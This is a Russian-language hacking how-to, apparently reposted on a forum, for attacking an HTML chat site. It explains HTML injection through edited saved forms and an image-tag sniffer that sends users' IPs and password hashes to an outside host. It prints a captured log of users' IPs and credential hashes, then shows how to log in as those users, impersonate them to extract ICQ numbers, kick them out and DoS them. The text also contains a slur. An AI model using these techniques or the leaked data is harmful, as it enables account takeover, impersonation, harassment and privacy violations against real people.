Ты, конечно же, в курсе, что многие чаты на www далеки от совершенства. Нет, ну конечно, у них там есть всякие фенечки, всякие картиночки, рисуночки и прочая фигня, но вот защита там частенько просто отсутствует. Таких чатов полно, поэтому мы решили взять первый попавшийся из них и описать способы взлома. Системным администраторам этого чата Х советует еще раз проверить, что они там наконфигурили, и заткнуть все описываемые ниже дырки. Чат находится по адресу www.chat.orc.ru.
Будь готов - всегда готов
Когда нефига делать, то можно залезть и поприкалываться в html-чатах. Там, как правило, сидят ламеры и уроды, а также люди, которые только зашли в Инет. Прикалываться можно по разному: вставляя нецензурную брань, неприличные картинки, java-скрипты и прочие пакости. Чат "Початок" представляет стандартный, но немного переделанный свободно распространяемый чат "Chat Machine". В нем, якобы, запрещено вставлять html-теги, но мы это исправим. Размер и цвет шрифтов, которые определил админ, мы тоже исправим, как и скрытие IP других юзеров.
Как менять установки шрифта
Сохраняем то окно, где находятся установки (цвет, размер), открываем текстовым редактором и ищем следующую строчку Красный. Вместо слова Red можно подставить любое название цвета, ведь по умолчанию можно выбирать только цвета, установленные админом. :)
Находим поле Большой. Разве "+2" это большой шрифт? :) Нет, так дело не пойдет, пишем "+5".
Как вставлять теги
Находим стоку Красный. Берем и изменяем его следующим образом: Красный. Не закрываем тэг (потому что он и так закроется) и после название цвета закрываем тэг. Пишем любое сообщение, и тем самым получается, что чатлане видят не совсем пристойную картинку. :)
Таким образом можно ставить любой тэг типа Красный, и чат начинает "летать" :).
Как войти в чат под другим зарегистрированным пользователем и узнать их IP адреса
Находим строчку Красный и, используя всем известный синффер html чатов, получаем IP участников чата и их пароли. Делается это следующим образом: http://www.hackzone.ru/cgi-bin/sniff.cgi?satan">Красный. Далее пишем какое-либо сообщение, видим картинку HackZone и смотрим лог по адресу http://www.hackzone.ru/files/snifflog.txt. В нем мы видим следующее:
[Tue 3:03pm] (id) 195.210.130.46 d046.p1.col.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=YURIK&passwd=31ZUlukFqoI5c&custom1=on]
[Tue 3:03pm] (id) 212.15.128.4 dobbin.eurocom.od.ua 212.15.128.42 [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=afrodita&passwd=480/SYC8r5W3U&custom1=on]
[Tue 3:03pm] (id) 129.132.26.41 ilea1.ethz.ch [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=Monach&passwd=49aiRPRMobjZ6&custom1=on]
[Tue 3:03pm] (id) 195.2.78.163 p163.n78.dip.aha.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=Patron25&passwd=13ttx6i7zWwkk&custom1=on]
[Tue 3:03pm] (id) 199.203.4.5 customer.netvision.net.il 207.232.23.220,194.90.119.123 [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=_RENAT__&passwd=315ybDkg5YM22&custom1=on]
[Tue 3:03pm] (id) 193.232.119.130 ns.misa.ac.ru 192.168.12.133 [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=Dasha&passwd=27tQONxBHE612&custom1=on]
[Tue 3:03pm] (id) 195.210.130.46 d046.p1.col.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=YURIK&passwd=31ZUlukFqoI5c&custom1=on]
[Tue 3:03pm] (id) 195.91.140.77 ppp666.nigger.is.satan.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=Satan&passwd=40xtEwTiIfRQI&custom1=on]
[Tue 3:03pm] (id) 195.2.78.163 p163.n78.dip.aha.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=Patron25&passwd=13ttx6i7zWwkk&custom1=on]
[Tue 3:02pm] (id) 195.34.28.213 dialup-28213.dialup.ptt.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=_GUN_&passwd=13/hfDaaKZEeg&custom1=on]
Вот они все на ладони :).
Если надо, запингуем кого-нибудь со всех шеллов, а особых уродов заДоСим чем-нибудь типа kod.c или pimp.c.
Как хакеры втираются в доверие
Теперь можно зайти под любым пользователем, который находится в чате, не зная его пароль. Выбираем, например, доброго GUN'a, который уже 2 года в этом чате сидит и которому все доверяют. :) Копируем его строку и вставляем в браузер: http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=_GUN_&passwd=13/hfDaaKZEeg&custom1=on.
Вуаля! Мы зашли под ним в чат, и теперь, сославшись на потерю памяти, можно выведать у всех пользователей ICQ номера, дать чего надо и наслаждаться жизнью. :)
Не забудь, что после каждого изменения твоего файла с установками его нужно сохранять и нажимать кнопку применить.
Исходник снифера можно взять по адресу http://www.hackzone.ru/files/sniff.txt и изменить, чтобы не показывалась картинка, а то особо мудрые совы могут что-то заподозрить.
Очень много людей знают про хакзоновский сниффер, так что можно воспользоваться нашим: http://phorce.virtualave.net/cgi-bin/sniffer.cgi, лог-файл: http://phorce.virtualave.net/cgi-bin/fuck.log.
Как говорить от других имен
Узнав шифрованный пароль того кого нужно с помощью сниффера, сохраняем то окно, где нужно писать текст, и вставляем вместо своего ника чужой (и пароль, конечно), и пишем чего душе угодно!
Как выкидывать из чата
Опять же, получив шифрованный пароль в документе с настройками, сохраненном на нашем диске, в самом низу вставляем вместо своего ника и пароля - чужие. Сохраняем, открываем, жмем выход, затем видим сообщение, что Вася Пупкин покинул чат. :)
Как защититься от сниффера
Это очень просто. Залезаем в установки броузера и вырубаем показ картинок.
Опубликовал Kest
October 26 2008 13:27:23 ·
1 Комментариев ·
8254 Прочтений ·
• Не нашли ответ на свой вопрос? Тогда задайте вопрос в комментариях или на форуме! •
Комментарии
ibragim December 24 2011 03:42:28
airwayfun.com
Добавить комментарий
Рейтинги
Рейтинг доступен только для пользователей.
Пожалуйста, залогиньтесь или зарегистрируйтесь для голосования.
Нет данных для оценки.
Гость
Вы не зарегистрированны? Нажмите здесь для регистрации.
Главная
Каталог файлов
